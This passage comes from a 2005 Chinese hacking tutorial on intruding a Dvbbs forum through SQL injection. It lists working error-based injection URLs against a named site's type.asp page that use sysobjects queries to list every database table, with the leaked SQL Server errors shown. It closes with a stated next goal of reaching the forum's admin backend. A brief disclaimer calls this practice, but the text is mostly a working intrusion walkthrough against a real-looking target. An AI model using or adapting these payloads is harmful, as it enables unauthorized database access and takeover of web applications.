| 二.得到数据库表名 不出意外的话动网的各个表就存在于当前数据库01city中。 首先得到第一个表: http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in(''))-- 返回:[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'address' 转换为数据类型为 int 的列时发生语法错误。 好的,第一个表名出来了,为: address 继续, http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in('address'))-- 返回: admin 第二个表名也出来了。依次类推, 提交: http://www.loveyou.com/type.asp?id=(select top 1 name from sysobjects where xtype='u' and status>0 and name not in('address','admin',...))-- 可以得到当前数据库中所有表名。 不一会儿,结果出来了, 表名好眼熟啊。 "address","admin","bbslink","bbsnews","board","user".........傻瓜都看的出这是动网的表。当然还有其它的一些表,我们不去管它。 接下来就好办了,也不要去猜字段了,我们打开自己的动网数据库看一下就知道了。 既然有了表名,字段名,那么,动网不就在你掌握之下了吗? 但千万不要 drop table啊。 破坏就不好了。我们的目的是演练技术,提高水平。 好,那么,我们去得到动网的后台。 |
正在阅读:再谈SQL注入入侵动网SQL版论坛再谈SQL注入入侵动网SQL版论坛
2005-01-12 10:04
出处:
责任编辑:huangpeidan
键盘也能翻页,试试“← →”键
